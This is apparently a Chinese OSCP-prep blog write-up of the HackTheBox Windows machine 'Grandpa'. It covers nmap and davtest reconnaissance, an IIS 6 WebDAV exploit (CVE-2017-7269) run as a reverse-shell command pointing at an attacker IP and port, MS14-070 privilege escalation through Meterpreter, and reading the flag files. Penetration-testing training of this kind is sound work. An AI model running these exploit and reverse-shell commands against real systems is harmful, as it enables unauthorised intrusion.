OSCP备考_0x42_HackThBox靶机_Windows_grandpa

Ethan医生7个月前 (07-10)靶场218

grandpa

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.95.233 (扫描TCP)

跟上个靶场好像

davtest -url 10.129.95.233

没有可以利用的文件

那直接使用iis漏洞

https://github.com/ethanyu630/CVE-2017-7269

python2.7 ii6_reverse_shell.py 10.129.95.233 80 10.10.16.43 4444

提权

手动上传不了看都是使用msf 我要考OSCP就不操作了...

使用MS14-070直接提权获取到ROOT

meterpreter > search -f user.txt
Found 1 result...
    c:\Documents and Settings\Harry\Desktop\user.txt (32 bytes)
meterpreter > search -f root.txt
Found 1 result...
    c:\Documents and Settings\Administrator\Desktop\root.txt (32 bytes)
meterpreter >
meterpreter > cd 'C:\Documents and Settings'

cat Harry/Desktop/user.txt
cat Administrator/Desktop/root.txt

标签: OSCP

返回列表

上一篇：OSCP备考_0x41_HackThBox靶机_Windows_granny

下一篇：OSCP备考_0x43_HackThBox靶机_Windows_arctic

相关文章

OSCP备考_0x13_Vulnhub靶机_Raven: 1

OSCP备考_0x13_Vulnhub靶机_Raven: 1

名称说明靶机下载链接https://www.vulnhub.com/entry/raven-1,256/攻击机（kali）ip：192.168.233.168靶机（CentOS）ip：192.168....

OSCP备考_0x15_HackThBox靶机_Linux_networked

OSCP备考_0x15_HackThBox靶机_Linux_networked

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.204.201 (扫描TCP)nmap -sU --top-ports 100 ...

OSCP备考_0x37_HackThBox靶机_ScriptKiddie

OSCP备考_0x37_HackThBox靶机_ScriptKiddie

ScriptKiddienmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.95.150 (扫描TCP)访问5000端口，发现是一个集成工具...

OSCP备考_0x11_Vulnhub靶机_IMF: 1

OSCP备考_0x11_Vulnhub靶机_IMF: 1

名称说明靶机下载链接https://www.vulnhub.com/entry/imf-1,162/攻击机（kali）ip：192.168.233.168靶机（CentOS）ip：192.168.23...

OSCP备考_0x27_HackThBox靶机_Linux_ Admirer

OSCP备考_0x27_HackThBox靶机_Linux_ Admirer

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.128.76 (扫描TCP)nmap -sU --top-ports 100 ...

OSCP备考_0x10_HackThBox靶机_Linux_Sunday

OSCP备考_0x10_HackThBox靶机_Linux_Sunday

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.252.243 (扫描TCP)nmap -sU --top-ports 100 10.129.25...

发表评论